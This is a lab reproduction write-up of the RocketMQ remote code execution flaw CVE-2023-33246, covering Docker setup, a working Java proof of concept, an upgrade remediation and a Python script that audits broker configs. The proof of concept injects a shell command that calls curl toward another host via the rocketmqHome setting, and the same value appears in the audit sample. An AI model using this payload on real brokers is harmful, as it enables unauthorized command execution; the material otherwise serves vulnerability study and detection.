RocketMQ Remote Code Execution (CVE-2023-33246)

Preface

When RocketMQ components such as the NameServer, Broker and Controller are exposed to an external network without access control, an attacker can abuse the configuration-update feature to execute commands as the system user the RocketMQ process runs as.

Details: https://mp.weixin.qq.com/s/FZ3NyR8YnqWHn1pv_Dmtyg

Affected versions

Apache RocketMQ <= 5.1.0
Apache RocketMQ <= 4.9.5
Environment setup

Pull the images

```shell
docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0
```

Start the namesrv

```shell
docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
```
Create the config directory

```shell
mkdir -p /mydata/rocketmq/conf/
```

Create the broker configuration file on the host; it is needed to start the broker service. The path I use is /mydata/rocketmq/conf/broker.conf.

File contents (vim /mydata/rocketmq/conf/broker.conf):

```properties
brokerClusterName = DefaultCluster
brokerName = broker-a
brokerId = 0
deleteWhen = 04
fileReservedTime = 48
brokerRole = ASYNC_MASTER
flushDiskType = SYNC_FLUSH
brokerIP1 = 192.168.88.104
```

Note: 192.168.88.104 is my host IP.
Start the broker

```shell
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
```

Start the console

```shell
docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv \
  -e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876 \
  -Dcom.rocketmq.sendMessageWithVIPChannel=false" \
  -t apacherocketmq/rocketmq-console:2.0.0
```

Visit http://192.168.88.104:8899
POC attack

Download address:

https://github.com/I5N0rth/CVE-2023-33246

mqrce.java

```java
package org.example;

import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;

import java.util.Properties;

/**
 * Created by IntelliJ IDEA.
 *
 * @Author: Garck3h
 * @Date: 2023/5/31
 * @Time: 20:22
 * Life is endless, and there is no end to it.
 **/
public class mqrce {
    public static void main(String[] args) throws Exception {
        String[] urls = {"192.168.88.104:8899"};
        for (int i = 0; i < urls.length; i++) {
            updateConfig(urls[i]);
        }
    }

    public static void updateConfig(String url) throws Exception {
        Properties props = new Properties();
        props.setProperty("rocketmqHome", "-c $@ |sh . echo curl 192.168.1.7:8877");
        props.setProperty("filterServerNums", "1");

        // Create and start a DefaultMQAdminExt client
        DefaultMQAdminExt admin = new DefaultMQAdminExt();
        admin.setNamesrvAddr("192.168.88.104:9876");
        admin.start();

        // Update the broker configuration
        admin.updateBrokerConfig(url, props);
        Properties brokerConfig = admin.getBrokerConfig(url);
        System.out.println(brokerConfig.getProperty("rocketmqHome"));
        System.out.println(brokerConfig.getProperty("filterServerNums"));

        // Shut down the DefaultMQAdminExt client
        admin.shutdown();
    }
}
```
Maven configuration file pom.xml

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>test1</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.apache.rocketmq</groupId>
            <artifactId>rocketmq-tools</artifactId>
            <version>4.9.1</version>
        </dependency>
    </dependencies>
</project>
```
Remediation

The vendor has released a security fix; affected users should upgrade to Apache RocketMQ 5.1.1 or 4.9.6.

https://rocketmq.apache.org/download/
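As an added, defender-side example (not part of the original post or of the RocketMQ project), the check below parses a broker configuration dump in broker.conf's `key = value` form and flags the two settings the proof of concept above manipulates: a `rocketmqHome` that is not a plain absolute path, and a non-zero `filterServerNums`. The sample inputs are constructed, and Linux-style paths are assumed.

```python
"""Audit a RocketMQ broker configuration dump for the CVE-2023-33246 pattern."""
import re

# Characters that have no business in a filesystem path: whitespace and
# shell metacharacters. A legitimate rocketmqHome is something like /opt/rocketmq.
_SHELL_META = re.compile(r"[\s|;&$`<>()'\"\\]")


def parse_properties(text: str) -> dict:
    """Parse 'key = value' lines in the broker.conf format; '#' lines are comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        props[key.strip()] = value.strip()
    return props


def audit_broker_config(props: dict) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    home = props.get("rocketmqHome", "")
    if home and (not home.startswith("/") or _SHELL_META.search(home)):
        findings.append(f"rocketmqHome is not a plain absolute path: {home!r}")
    nums = props.get("filterServerNums", "0")
    if nums != "0":
        findings.append(f"filterServerNums={nums}: broker would spawn filter servers")
    return findings


# Constructed samples: a benign config and one carrying the values the POC sets.
BENIGN = """
brokerClusterName = DefaultCluster
brokerName = broker-a
rocketmqHome = /opt/rocketmq
filterServerNums = 0
"""
TAMPERED = """
brokerName = broker-a
rocketmqHome = -c $@ |sh . echo curl 192.168.1.7:8877
filterServerNums = 1
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(name, audit_broker_config(parse_properties(text)) or "clean")
```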